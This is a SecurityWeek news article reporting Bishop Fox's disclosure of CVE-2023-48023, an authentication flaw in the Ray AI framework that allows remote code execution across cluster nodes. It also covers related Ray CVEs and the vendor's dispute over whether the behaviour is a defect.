Connect with us

Hi, what are you looking for?


Artificial Intelligence

Critical Vulnerability Found in Ray AI Framework 

A critical issue in open source AI framework Ray could provide attackers with operating system access to all nodes.

A critical vulnerability in Ray, an open source compute framework for AI, could allow unauthorized access to all nodes, cybersecurity firm Bishop Fox warns.

Tracked as CVE-2023-48023, the bug exists because Ray does not properly enforce authentication on at least two of its components, namely the dashboard and client.

A remote attacker can abuse this issue to submit or delete jobs without authentication. Furthermore, the attacker could retrieve sensitive information and execute arbitrary code, Bishop Fox says.

“The vulnerability could be exploited to obtain operating system access to all nodes in the Ray cluster or attempt to retrieve Ray EC2 instance credentials (in a typical AWS cloud install),” the cybersecurity firm notes.

CVE-2023-48023 is rooted in the fact that, in its default configuration, Ray does not enforce authentication, and does not appear to support any type of authorization model, although an optional mutual TLS authentication mode is described in the framework’s documentation.

“In other words, even if a Ray administrator explicitly enabled TLS authentication, they would be unable to grant users different permissions, such as read-only access to the Ray dashboard,” Bishop Fox says.

According to the cybersecurity firm, attackers could exploit CVE-2023-48023 via the job submission API, by submitting arbitrary operating system commands.

Ray’s lack of authentication leads to other security vulnerabilities, including issues that were recently disclosed by Protect AI, which manages Huntr, the bug bounty platform for AI and ML.

Advertisement. Scroll to continue reading.

Bishop Fox says it independently identified two of these issues and reported them to Ray’s maintainers (Anyscale) around the same time as Protect AI.

“However, the reports were closed based on Anyscale’s position that unauthenticated remote code execution is intentional, and therefore should not be considered a vulnerability,” the cybersecurity firm says.

Furthermore, the company says, the Ray jobs Python SDK can be used for unauthenticated, remote code execution, by crafting a malicious script, using the Ray API for task submission. The Ray client API can also be abused for unauthenticated remote code execution.

Bishop Fox draws attention to other critical-severity vulnerabilities in Ray as well, including a server-side request forgery (SSRF) bug (CVE-2023-48022) and an insecure input validation flaw (CVE-2023-6021) that Protect AI reported to the vendor this summer.

At least some of these issues, the cybersecurity firm notes, remain unpatched, as the vendor either does not recognize them as security defects or does not want to address them.

Related: OpenAI Patches Account Takeover Vulnerabilities in ChatGPT

Related: US, UK Cybersecurity Agencies Publish AI Development Guidance

Related: CISA Outlines AI-Related Cybersecurity Efforts

Written By

Ionut Arghire is an international correspondent for SecurityWeek.


Daily Briefing Newsletter

Subscribe to the SecurityWeek Email Briefing to stay informed on the latest threats, trends, and technology, along with insightful columns from industry experts.

Gain valuable insights from industry professionals who will help guide you through the intricacies of industrial cybersecurity.


Join us for an in depth exploration of the critical nature of software and vendor supply chain security issues with a focus on understanding how attacks against identity infrastructure come with major cascading effects.


Expert Insights

Related Content

Artificial Intelligence

The CRYSTALS-Kyber public-key encryption and key encapsulation mechanism recommended by NIST for post-quantum cryptography has been broken using AI combined with side channel attacks.

Artificial Intelligence

The release of OpenAI’s ChatGPT in late 2022 has demonstrated the potential of AI for both good and bad.

Artificial Intelligence

ChatGPT is increasingly integrated into cybersecurity products and services as the industry is testing its capabilities and limitations.

Artificial Intelligence

The degree of danger that may be introduced when adversaries start to use AI as an effective weapon of attack rather than a tool...

Artificial Intelligence

Two of humanity’s greatest drivers, greed and curiosity, will push AI development forward. Our only hope is that we can control it.

Artificial Intelligence

Microsoft and Mitre release Arsenal plugin to help cybersecurity professionals emulate attacks on machine learning (ML) systems.

Application Security

Thinking through the good, the bad, and the ugly now is a process that affords us “the negative focus to survive, but a positive...

Artificial Intelligence

Two new surveys stress the need for automation and AI – but one survey raises the additional specter of the growing use of bring...